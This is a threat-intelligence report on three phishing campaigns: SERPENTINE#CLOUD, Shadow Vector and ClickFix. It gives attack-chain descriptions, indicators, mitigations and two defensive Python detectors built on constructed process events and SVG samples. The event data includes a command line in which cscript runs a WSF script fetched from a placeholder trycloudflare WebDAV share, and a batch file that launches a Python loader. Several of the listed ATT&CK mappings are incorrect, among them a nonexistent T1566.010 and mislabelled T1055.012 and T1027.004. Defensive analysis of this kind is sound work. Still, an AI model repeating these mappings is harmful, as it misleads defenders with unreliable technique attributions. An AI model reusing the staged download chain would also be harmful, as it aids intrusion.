Full Report
A new campaign is making use of Cloudflare Tunnel subdomains to host malicious payloads and deliver them via malicious attachments embedded in phishing emails. The ongoing campaign has been codenamed SERPENTINE#CLOUD by Securonix. It leverages "the Cloudflare Tunnel infrastructure and Python-based loaders to deliver memory-injected payloads through a chain of shortcut files and obfuscated
Analysis Summary
# Tool/Technique: SERPENTINE#CLOUD Campaign
## Overview
SERPENTINE#CLOUD is the codename for an ongoing phishing campaign that utilizes Cloudflare Tunnel subdomains to host malicious payloads. The campaign employs a multi-step infection chain involving LNK shortcut files, obfuscated scripts, and memory injection, culminating in the deployment of remote access trojans.
## Technical Details
- Type: Campaign / Attack Chain leveraging multiple tools
- Platform: Windows
- Capabilities: Phishing delivery, execution via LNK files, multi-stage payload loading, memory injection, evasion of traditional blocking mechanisms.
- First Seen: The article mentions a variation was documented last year, with the current iteration being actively analyzed.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (Leveraging batch files)
- T1059.005 - Visual Basic
- T1027 - Obfuscated Files or Information
- T1027.004 - Deobfuscation via Custom Code
- T1055 - Process Injection
- T1055.012 - Process Injection: Native API
- T1573 - Encrypted Channel
- T1573.002 - Asymmetric Encryption (Implied by use of Cloudflare Tunnel for encrypted transport)
## Functionality
### Core Capabilities
- Initial access via payment/invoice-themed phishing emails containing zipped documents with LNK files.
- Utilization of legitimate Cloudflare Tunnel subdomains for hosting payloads and C2 communication.
- Downloading next-stage payloads (WSF, then batch script) from a remote WebDAV share hosted on Cloudflare Tunnel sites.
- Execution chain involving `cscript.exe` launching a VBScript-based loader (WSF) which then runs a batch file (`kiki.bat`).
### Advanced Features
- **Memory Injection:** Final payloads (like AsyncRAT or Revenge RAT) are Donut-loaded entirely into memory, avoiding disk-based detection.
- **Evasion:** Leveraging legitimate, trusted cloud infrastructure (Cloudflare Tunnel) makes domain/URL blocking exceedingly difficult.
- **Anti-AV Check:** The batch script specifically checks for the presence of antivirus software before proceeding.
- **LLM Vibe-Coding:** The presence of well-defined comments suggests the script might have been generated using a Large Language Model.
## Indicators of Compromise
- File Hashes: [Not specified in the context]
- File Names: LNK files (disguised as documents), `kiki.bat`
- Registry Keys: [Not specified in the context]
- Network Indicators: Payloads retrieved over WebDAV from subdomains hosted on `*.trycloudflare[.]com`.
- Behavioral Indicators: Execution of WSF via `cscript.exe`, batch script executing Python payloads, memory execution of Donut-packed code.
## Associated Threat Actors
- Unknown (the actor's identity has not been established, though the report notes their English fluency).
- Associated with past use of AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm in prior related campaigns.
## Detection Methods
- Signature-based detection: Signatures for specific malicious file hashes (if available) or the Donut loader artifacts in memory.
- Behavioral detection: Monitoring for `cscript.exe` or `wscript.exe` initiating complex execution chains, unexpected network connections from office applications, or Python scripts executing high-entropy shellcode.
- YARA rules: Rules targeting known shellcode or Python loader characteristics.
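As an added example (not code from the Securonix report), the behavioural detection described above can be expressed as a small rule set run over process-creation events. The events below are constructed, Sysmon-style records of the LNK -> WSF -> batch -> Python chain, with a placeholder tunnel subdomain, constructed paths and pids, and one benign Python process for contrast; the rule names and the "user-writable directory" list are assumptions.

```python
# Added example, not part of the Securonix report: a small detector run over
# constructed, Sysmon-style process-creation events that looks for the
# SERPENTINE#CLOUD behavioural indicators listed above. All paths, pids and the
# tunnel subdomain are constructed placeholders.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # command line as logged


SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
KNOWN_FILENAMES = {"kiki.bat"}  # file name indicator from the report
# UNC path to a WebDAV share on a Cloudflare Tunnel subdomain, e.g.
# \\something.trycloudflare.com@SSL\DavWWWRoot\...
TUNNEL_UNC = re.compile(r"\\\\[a-z0-9-]+\.trycloudflare\.com", re.I)
# Directories an ordinary user can write to; python.exe running from here is unusual
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata|downloads|desktop)|windows\\temp|programdata)\\", re.I
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (pid, finding) tuples for events matching the campaign's indicators."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        cmd = e.cmdline.lower()
        if TUNNEL_UNC.search(e.cmdline):
            findings.append((e.pid, "webdav_trycloudflare_path"))
        if name in SCRIPT_HOSTS and ".wsf" in cmd:
            findings.append((e.pid, "script_host_runs_wsf"))
        if name == "cmd.exe" and parent_name in SCRIPT_HOSTS and ".bat" in cmd:
            findings.append((e.pid, "script_host_spawns_batch"))
        if any(fn in cmd for fn in KNOWN_FILENAMES):
            findings.append((e.pid, "known_ioc_filename"))
        if name.startswith("python") and USER_WRITABLE.match(e.image):
            findings.append((e.pid, "python_from_user_writable_dir"))
    return findings


# Constructed event chain mirroring the described LNK -> WSF -> batch -> Python flow,
# plus one benign Python process for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe //nologo \\placeholder-words.trycloudflare.com@SSL\DavWWWRoot\invoice.wsf"),
    ProcEvent(102, 101, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\kiki.bat"),
    ProcEvent(103, 102, r"C:\Users\alice\AppData\Local\Temp\py\python.exe",
              r"python.exe C:\Users\alice\AppData\Local\Temp\py\loader.py"),
    ProcEvent(104, 100, r"C:\Program Files\Python311\python.exe",
              r"python.exe C:\Projects\report.py"),
]

if __name__ == "__main__":
    for pid, finding in analyze(SAMPLE_EVENTS):
        print(pid, finding)
```

Each rule on its own is noisy (a script host running a WSF is common in administration), so in practice the value is in correlating them along the parent chain: a script host that spawns a batch file which in turn starts Python from a temp directory is what should raise an alert, not any single event.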
## Mitigation Strategies
- Prevention measures: Email filtering tuned to block suspicious attachments or links from known Cloudflare Tunnel ranges if possible, though this is challenging.
- Hardening recommendations: Implement application control to restrict execution of scripts (WSF, BAT) or Python from unusual directories, enforce strong LNK file scanning, and deploy advanced endpoint protection capable of detecting in-memory payloads.
## Related Tools/Techniques
- AsyncRAT (Payload)
- Revenge RAT (Payload)
- GuLoader (Stager used in prior variations)
- Donut loader (Loader used for memory injection)
- Living-off-the-land techniques (Use of inherent Windows scripting hosts)
---
# Tool/Technique: Shadow Vector Campaign
## Overview
Shadow Vector is a malware campaign identified by Acronis that specifically targets users in Colombia, primarily using booby-trapped Scalable Vector Graphics (SVG) files delivered via phishing emails impersonating court notifications. The campaign ultimately deploys RATs or utilizes a .NET loader associated with stealer malware.
## Technical Details
- Type: Campaign / Attack Chain
- Platform: Windows
- Capabilities: Phishing delivery using SVG smuggling, hosting payloads on public file-sharing services (Internet Archive, Bitbucket, Dropbox, Discord, YDRAY), memory-resident execution via modular loader.
- First Seen: Active at the time of the article; no earlier date is given.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1027 - Obfuscated Files or Information
- T1027.017 - SVG Smuggling (Key technique used for delivery)
- T1140 - Deobfuscate/Decode Files or Information (Implied by embedding Base64 payloads in SVG)
- T1574 - Hijack Execution Flow
- T1574.002 - DLL Side-Loading (Malicious DLLs loaded by legitimate executables in download archives)
- T1055 - Process Injection (Implied by the memory-resident loader executing payloads dynamically)
## Functionality
### Core Capabilities
- Spear-phishing emails impersonating trusted Colombian institutions (court notifications).
- Infection triggered via SVG decoys with embedded links to JS/VBS stagers on public platforms, *or* password-protected ZIP files containing payloads.
- Payloads hidden in Base64-encoded text within SVG images hosted on the Internet Archive.
### Advanced Features
- **DLL Sideloading:** Download archives contain legitimate executables alongside malicious DLLs, which are sideloaded.
- **Modular Memory-Resident Loader:** The threat actor uses a loader capable of executing payloads entirely in memory, minimizing disk residue.
- **Cross-Regional TTP similarity:** Presence of Portuguese-language strings/method parameters suggests potential code reuse or collaboration with actors targeting Brazilian users.
## Indicators of Compromise
- File Hashes: [Not specified in the context]
- File Names: SVG decoys, JS/VBS stagers, password-protected ZIP archives.
- Registry Keys: [Not specified in the context]
- Network Indicators: Payloads hosted on Internet Archive, Bitbucket, Dropbox, Discord, YDRAY (defanged: internetarchive[.]org, bitbucket[.]org, dropbox[.]com, discord[.]com, ydray[.]com)
- Behavioral Indicators: Execution of JS/VBS stagers, DLL sideloading events, memory execution of non-file-backed code.
## Associated Threat Actors
- Unknown (Associated with observed TTPs similar to Brazilian banking malware).
- Known payloads include AsyncRAT and Remcos RAT; recent variants used a .NET loader associated with Katz Stealer.
## Detection Methods
- Signature-based detection: Signatures for known AsyncRAT/Remcos binaries or the .NET loader associated with Katz Stealer.
- Behavioral detection: Detection of SVG files containing suspiciously large or encoded strings (Base64), or processes attempting DLL sideloading.
- YARA rules: Rules targeting file formats attempting to abuse SVG for staging or rules targeting known memory loader structures.
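As an added example (not code from the Acronis research or the original report), the SVG-focused detection above can be implemented as a static triage step: parse the file, flag `script` elements, flag links to the file-sharing hosts listed under the network indicators, and report any long Base64 run with its decoded size and entropy. The two sample SVGs are constructed; the 256-character run threshold and the finding names are assumptions.

```python
# Added example, not part of the Acronis research or the original report: static
# triage of an SVG for the smuggling indicators described above (script content,
# long Base64 runs, links to the file-sharing hosts the report names). The sample
# SVGs and the 256-character threshold are constructed assumptions.
import base64
import math
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
B64_RUN = re.compile(r"[A-Za-z0-9+/]{256,}={0,2}")
# Hosting services listed under the report's network indicators, as a plain watchlist
WATCHLIST_HOSTS = ("internetarchive.org", "bitbucket.org", "dropbox.com",
                   "discord.com", "ydray.com")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; compressed or encrypted payloads sit near 8, plain text far lower."""
    if not data:
        return 0.0
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _local(tag: str) -> str:
    return tag.split("}", 1)[-1]


def _host_of(url: str) -> str:
    return re.sub(r"^[a-z][a-z0-9+.-]*://", "", url, flags=re.I).split("/")[0].lower()


def triage_svg(svg_text: str) -> list:
    """Return a list of finding dicts; an empty list means nothing suspicious was seen."""
    # ElementTree keeps the example dependency-free; for untrusted input in
    # production, parse with defusedxml so entity expansion is disabled.
    root = ET.fromstring(svg_text)
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append({"kind": "script_element"})
        if tag == "a":
            host = _host_of(el.attrib.get("href") or el.attrib.get(XLINK_HREF) or "")
            if any(host == h or host.endswith("." + h) for h in WATCHLIST_HOSTS):
                findings.append({"kind": "external_href_watchlist", "host": host})
        for s in [el.text or "", el.tail or "", *el.attrib.values()]:
            for m in B64_RUN.finditer(s):
                run = m.group(0).rstrip("=")
                try:
                    decoded = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
                except ValueError:
                    continue  # not valid Base64 after all
                findings.append({"kind": "large_base64_blob", "element": tag,
                                 "decoded_len": len(decoded),
                                 "entropy": round(shannon_entropy(decoded), 2)})
    return findings


BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              '<circle cx="5" cy="5" r="4" fill="red"/></svg>')

# Constructed decoy: a court-notice style link plus a script element carrying a
# Base64 blob of harmless placeholder text standing in for a real payload.
_BLOB = base64.b64encode(b"constructed placeholder payload " * 16).decode()
SUSPICIOUS_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<a xlink:href="https://ydray.com/placeholder-path"><text x="5" y="15">Abrir notificacion</text></a>'
    '<script>var p = "' + _BLOB + '";</script></svg>'
)

if __name__ == "__main__":
    for f in triage_svg(SUSPICIOUS_SVG):
        print(f)
```

Legitimate SVGs do embed Base64 in `data:` URIs for raster images, so the decoded entropy and element type are reported rather than used as a verdict on their own: a long blob inside a `script` element, or one whose decoded bytes are near 8 bits per byte without an image header, is what merits a closer look.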
## Mitigation Strategies
- Prevention measures: Strict email gateway rules blocking domains known for file sharing if possible, or high scrutiny on ZIP archives from unknown senders.
- Hardening recommendations: Strong user training regarding finance/legal document lookalikes, enabling macro/script blocking in Office, and ensuring robust endpoint detection focused on process monitoring (especially DLL loading).
## Related Tools/Techniques
- AsyncRAT (RAT)
- Remcos RAT (RAT)
- Katz Stealer (associated with the .NET loader seen in recent variants)
- SVG Smuggling (Delivery technique)
---
# Tool/Technique: ClickFix Tactic
## Overview
ClickFix is a social engineering tactic where attackers trick targets into performing seemingly necessary, mundane actions (like completing a CAPTCHA verification or fixing an issue) which results in the download and execution of malware, often stealers or RATs.
## Technical Details
- Type: Social Engineering Technique
- Platform: Multi-platform (the execution step usually targets Windows and relies on user interaction)
- Capabilities: Exploits user habituation to benign actions (CAPTCHAs), leading to drive-by downloads and initial payload execution without relying on traditional technical vulnerability exploitation.
- First Seen: The article notes a surge between March and May 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Often delivered via phishing leading to the "fix")
- T1204 - User Execution
- T1204.002 - Malicious File
- T1566.010 - Phishing: Drive-by Compromise (Described as central to drive-by downloads)
## Functionality
### Core Capabilities
- Deceiving targets into executing actions that look like routine web maintenance or necessary verification steps.
- Shifting attacker focus from exploiting software flaws to exploiting user errors.
### Advanced Features
- **Simplicity and Success Rate:** Highly effective due to its low complexity and reliance on common user behavior patterns (universal applicability).
- **Self-Infection:** Users perform the critical step of initiating the infection process themselves.
## Indicators of Compromise
- File Hashes: [Not specified in the context]
- File Names: Varies based on dropped payload (often disguised installers/fixers)
- Registry Keys: [Not specified in the context]
- Network Indicators: Connections fetching payloads from external, often ephemeral, resources.
- Behavioral Indicators: User interaction leading directly to unexpected file downloads or executions immediately post-interaction.
## Associated Threat Actors
- Various actors deploying Lumma Stealer and SectopRAT are leveraging this tactic.
## Detection Methods
- Signature-based detection: Hard to signature, since the tactic is a user behaviour rather than a fixed file or payload.
- Behavioral detection: Tracking processes initiated immediately following user interaction with seemingly harmless web elements or notifications.
- YARA rules: [Not applicable for a pure social engineering tactic]
## Mitigation Strategies
- Prevention measures: Implement strong application control policies to limit what users can execute.
- Hardening recommendations: Increase user training frequency focusing on unsolicited notifications requiring immediate action, especially those related to "fixing" files or CAPTCHA verification outside of known, trusted sites.
## Related Tools/Techniques
- Lumma Stealer (Associated Payload)
- SectopRAT (Associated Payload)
- Drive-by Compromise techniques